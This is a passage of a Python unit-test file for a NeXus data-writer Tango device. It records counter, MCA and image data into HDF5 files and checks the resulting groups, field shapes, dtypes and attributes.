self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
f.close()
            # check the third created file (steps 5-6)
fname = '%s/%s%s_00003.h5' % (
os.getcwd(), self.__class__.__name__, fun)
f = H5CppWriter.open_file(fname, readonly=True)
f = f.root()
self.assertEqual(5, len(f.attributes))
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 2)
en = f.open("entry1")
self.assertTrue(en.is_valid)
self.assertEqual(en.name, "entry1")
self.assertEqual(len(en.attributes), 1)
self.assertEqual(en.size, 2)
at = en.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXentry")
# ins = f.open("entry1/instrument:NXinstrument") #bad exception
# ins = f.open("entry1/instrument")
ins = en.open("instrument")
self.assertTrue(ins.is_valid)
self.assertEqual(ins.name, "instrument")
self.assertEqual(len(ins.attributes), 2)
self.assertEqual(ins.size, 1)
at = ins.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXinstrument")
at = ins.attributes["short_name"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "short_name")
self.assertEqual(at[...], "scan instrument")
det = ins.open("detector")
self.assertTrue(det.is_valid)
self.assertEqual(det.name, "detector")
self.assertEqual(len(det.attributes), 1)
self.assertEqual(det.size, 2)
at = det.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdetector")
# cnt = det.open("counter") # bad exception
cnt = det.open("counter1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 2)
value = cnt.read()
# value = cnt[:]
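            # steps 5 and 6 wrote counter[1] and counter[0] respectively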
for i in range(len(value)):
self.assertEqual(self._counter[1 - i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = det.open("mca")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "mca")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (2, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 4096)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[0][i])
for i in range(len(value[0])):
self.assertEqual(self._mca1[i], value[1][i])
self.assertEqual(len(mca.attributes), 4)
            at = mca.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
dt = en.open("data")
self.assertTrue(dt.is_valid)
self.assertEqual(dt.name, "data")
self.assertEqual(len(dt.attributes), 1)
self.assertEqual(dt.size, 2)
at = dt.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdata")
cnt = dt.open("cnt1")
self.assertTrue(cnt.is_valid)
            # the field opened via the NXdata link reports the link name "cnt1",
            # not the original field name "counter1"
self.assertEqual(cnt.name, "cnt1")
# self.assertEqual(cnt.name,"counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 2)
# print(cnt.read())
value = cnt[:]
for i in range(len(value)):
self.assertEqual(self._counter[1 - i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = dt.open("data")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "data")
            self.assertTrue(hasattr(mca.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (2, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 4096)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[0][i])
for i in range(len(value[0])):
self.assertEqual(self._mca1[i], value[1][i])
self.assertEqual(len(mca.attributes), 4)
            at = mca.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
f.close()
finally:
for i in range(1, 4):
fname = '%s/%s%s_%05d.h5' % (
os.getcwd(), self.__class__.__name__, fun, i)
if os.path.isfile(fname):
os.remove(fname)
if os.path.isfile(tfname):
os.remove(tfname)
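    # The scanRecordGrow* tests below drive the NeXus data writer Tango device
    # through the same client-side sequence; a minimal sketch (assuming a
    # running device, dp = PyTango.DeviceProxy(...), and a valid XML
    # configuration string xml):
    #
    #     dp.FileName = "scan.h5"
    #     dp.OpenFile()                                  # ON -> OPEN
    #     dp.XMLSettings = xml
    #     dp.OpenEntry()                                 # OPEN -> EXTRACT
    #     dp.Record(json.dumps({"data": {"exp_c01": [0.1, 0.2]}}))
    #     dp.CloseEntry()                                # EXTRACT -> OPEN
    #     dp.CloseFile()                                 # OPEN -> ON
    #
    # Each Record() call appends the supplied block along the growing (first)
    # dimension, so two calls with two points each yield fields of length 4
    # in the assertions below.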
# scanRecord test
# \brief It tests recording of simple h5 file
def test_scanRecordGrow3(self):
fun = sys._getframe().f_code.co_name
print("Run: %s.%s() " % (self.__class__.__name__, fun))
fname = "scantestgrow.h5"
try:
dp = PyTango.DeviceProxy(self._sv.device)
self.assertTrue(ProxyHelper.wait(dp, 10000))
# print 'attributes', dp.attribute_list_query()
# self.setProp(dp, "DefaultCanFail", False)
dp.FileName = fname
self.setProp(dp, "writer", "h5cpp")
dp.FileName = fname
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenFile()
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.XMLSettings = self._scanXml3 % fname
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenEntry()
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
cntg = [self._counter[0], self._counter[1]]
imageg = [self._image1a, self._image2a]
rec = {"data": {"exp_c01": cntg, "image": imageg}}
dp.Record(json.dumps(rec))
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
cntg = [self._counter[1], self._counter[0]]
imageg = [self._image2a, self._image1a]
rec = {"data": {"exp_c01": cntg, "image": imageg}}
dp.Record(json.dumps(rec))
dp.CloseEntry()
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseFile()
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
# check the created file
f = H5CppWriter.open_file(fname, readonly=True)
f = f.root()
self.assertEqual(5, len(f.attributes))
self.assertEqual(f.attributes["file_name"][...], fname)
            self.assertEqual(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 2)
en = f.open("entry1")
self.assertTrue(en.is_valid)
self.assertEqual(en.name, "entry1")
self.assertEqual(len(en.attributes), 1)
self.assertEqual(en.size, 2)
at = en.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXentry")
# ins = f.open("entry1/instrument:NXinstrument") #bad exception
# ins = f.open("entry1/instrument")
ins = en.open("instrument")
self.assertTrue(ins.is_valid)
self.assertEqual(ins.name, "instrument")
self.assertEqual(len(ins.attributes), 2)
self.assertEqual(ins.size, 1)
at = ins.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXinstrument")
at = ins.attributes["short_name"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "short_name")
self.assertEqual(at[...], "scan instrument")
det = ins.open("detector")
self.assertTrue(det.is_valid)
self.assertEqual(det.name, "detector")
self.assertEqual(len(det.attributes), 1)
self.assertEqual(det.size, 2)
at = det.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdetector")
# cnt = det.open("counter") # bad exception
cnt = det.open("counter1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (4,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 4)
value = cnt.read()
# value = cnt[:]
for i in range(len(value)):
self.assertEqual(
self._counter[i if i < 2 else 3 - i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = det.open("image")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "image")
            self.assertTrue(hasattr(mca.shape, "__iter__"))
self.assertEqual(len(mca.shape), 3)
self.assertEqual(mca.shape, (4, 100, 200))
self.assertEqual(mca.dtype, "int64")
self.assertEqual(mca.size, 80000)
value = mca.read()
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image1a[i][j], value[0][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image2a[i][j], value[1][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image2a[i][j], value[2][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image1a[i][j], value[3][i][j])
self.assertEqual(len(mca.attributes), 4)
            at = mca.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_INT64")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
dt = en.open("data")
self.assertTrue(dt.is_valid)
self.assertEqual(dt.name, "data")
self.assertEqual(len(dt.attributes), 1)
self.assertEqual(dt.size, 2)
at = dt.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdata")
cnt = dt.open("cnt1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "cnt1")
# self.assertEqual(cnt.name,"counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (4,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 4)
# print(cnt.read())
value = cnt[:]
for i in range(len(value)):
self.assertEqual(
self._counter[i if i < 2 else 3 - i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = dt.open("data")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "data")
            self.assertTrue(hasattr(mca.shape, "__iter__"))
self.assertEqual(len(mca.shape), 3)
self.assertEqual(mca.shape, (4, 100, 200))
self.assertEqual(mca.dtype, "int64")
self.assertEqual(mca.size, 80000)
value = mca.read()
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image1a[i][j], value[0][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image2a[i][j], value[1][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image2a[i][j], value[2][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image1a[i][j], value[3][i][j])
self.assertEqual(len(mca.attributes), 4)
            at = mca.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_INT64")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
f.close()
finally:
if os.path.isfile(fname):
os.remove(fname)
# scanRecord test
# \brief It tests recording of simple h5 file
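    # Same recording sequence as test_scanRecordGrow3, but with the device
    # property DefaultCanFail explicitly set to False before writing.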
def test_scanRecordGrow3_false(self):
fun = sys._getframe().f_code.co_name
print("Run: %s.%s() " % (self.__class__.__name__, fun))
fname = "scantestgrow.h5"
try:
dp = PyTango.DeviceProxy(self._sv.device)
self.assertTrue(ProxyHelper.wait(dp, 10000))
# print 'attributes', dp.attribute_list_query()
self.setProp(dp, "DefaultCanFail", False)
dp.FileName = fname
self.setProp(dp, "writer", "h5cpp")
dp.FileName = fname
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenFile()
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.XMLSettings = self._scanXml3 % fname
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenEntry()
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
cntg = [self._counter[0], self._counter[1]]
imageg = [self._image1a, self._image2a]
rec = {"data": {"exp_c01": cntg, "image": imageg}}
dp.Record(json.dumps(rec))
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
cntg = [self._counter[1], self._counter[0]]
imageg = [self._image2a, self._image1a]
rec = {"data": {"exp_c01": cntg, "image": imageg}}
dp.Record(json.dumps(rec))
dp.CloseEntry()
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseFile()
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
# check the created file
f = H5CppWriter.open_file(fname, readonly=True)
f = f.root()
self.assertEqual(5, len(f.attributes))
self.assertEqual(f.attributes["file_name"][...], fname)
            self.assertEqual(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 2)
en = f.open("entry1")
self.assertTrue(en.is_valid)
self.assertEqual(en.name, "entry1")
self.assertEqual(len(en.attributes), 1)
self.assertEqual(en.size, 2)
at = en.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXentry")
# ins = f.open("entry1/instrument:NXinstrument") #bad exception
# ins = f.open("entry1/instrument")
ins = en.open("instrument")
self.assertTrue(ins.is_valid)
self.assertEqual(ins.name, "instrument")
self.assertEqual(len(ins.attributes), 2)
self.assertEqual(ins.size, 1)
at = ins.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXinstrument")
at = ins.attributes["short_name"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "short_name")
self.assertEqual(at[...], "scan instrument")
det = ins.open("detector")
self.assertTrue(det.is_valid)
self.assertEqual(det.name, "detector")
self.assertEqual(len(det.attributes), 1)
self.assertEqual(det.size, 2)
at = det.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdetector")
# cnt = det.open("counter") # bad exception
cnt = det.open("counter1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (4,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 4)
value = cnt.read()
# value = cnt[:]
for i in range(len(value)):
self.assertEqual(
self._counter[i if i < 2 else 3 - i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = det.open("image")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "image")
            self.assertTrue(hasattr(mca.shape, "__iter__"))
self.assertEqual(len(mca.shape), 3)
self.assertEqual(mca.shape, (4, 100, 200))
self.assertEqual(mca.dtype, "int64")
self.assertEqual(mca.size, 80000)
value = mca.read()
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image1a[i][j], value[0][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image2a[i][j], value[1][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image2a[i][j], value[2][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image1a[i][j], value[3][i][j])
self.assertEqual(len(mca.attributes), 4)
            at = mca.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_INT64")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
dt = en.open("data")
self.assertTrue(dt.is_valid)
self.assertEqual(dt.name, "data")
self.assertEqual(len(dt.attributes), 1)
self.assertEqual(dt.size, 2)
at = dt.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdata")
cnt = dt.open("cnt1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "cnt1")
# self.assertEqual(cnt.name,"counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (4,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 4)
